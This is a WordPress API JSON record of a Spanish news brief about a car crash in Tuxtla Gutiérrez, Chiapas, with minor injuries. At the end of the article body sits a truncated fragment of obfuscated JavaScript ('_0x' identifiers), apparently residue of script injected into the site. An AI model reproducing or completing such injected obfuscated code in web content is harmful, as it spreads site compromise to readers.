{"id":12414,"date":"2023-11-06T00:15:28","date_gmt":"2023-11-06T00:15:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12414"},"modified":"2023-11-06T00:15:29","modified_gmt":"2023-11-06T00:15:29","slug":"choque-en-santa-cruz-deja-cuantiosos-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12414","title":{"rendered":"Choque en Santa Cruz, deja cuantiosos da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699229497528.jpg\" alt=\"\" class=\"wp-image-12415\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699229497528.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699229497528-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1699229497528-768x576.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 5 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un fuerte choque, en el Barrio Santa Cruz de Tuxtla Guti\u00e9rrez, sald\u00f3 con cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 este domingo por la ma\u00f1ana cuando una unidad tipo Urvan Toyota, conducido por Or\u00e1n M\u00e9ndez, de la ruta Galecio-Tuxtla Guti\u00e9rrez circulaba a la altura de la 13 Oriente, esquina 4a Sur, cuando fue impactada por una Renault tipo Duster, conducida por Daniel Mart\u00ednez, en el lado derecho.<\/p>\n\n\n\n<p>A pesar de lo aparatoso del accidente, \u00fanicamente hubo heridos leves por lo que no hubo necesidad de llevarlos a un nosocomio.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito, sin embargo, los involucrados no aceptaron responsabilidad alguna, por ello, las unidades involucradas fueron puestas a disposici\u00f3n del Ministerio P\u00fablico en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 5 de noviembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un fuerte choque, en el Barrio Santa Cruz de Tuxtla Guti\u00e9rrez, sald\u00f3 con cuantiosos da\u00f1os materiales. Los reportes oficiales informaron que, este hecho ocurri\u00f3 este domingo por la ma\u00f1ana cuando una unidad tipo Urvan Toyota, conducido por Or\u00e1n M\u00e9ndez, de la ruta Galecio-Tuxtla &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12415,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-12414","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12414","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12414"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12414\/revisions"}],"predecessor-version":[{"id":12416,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12414\/revisions\/12416"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12415"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12414"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12414"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12414"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}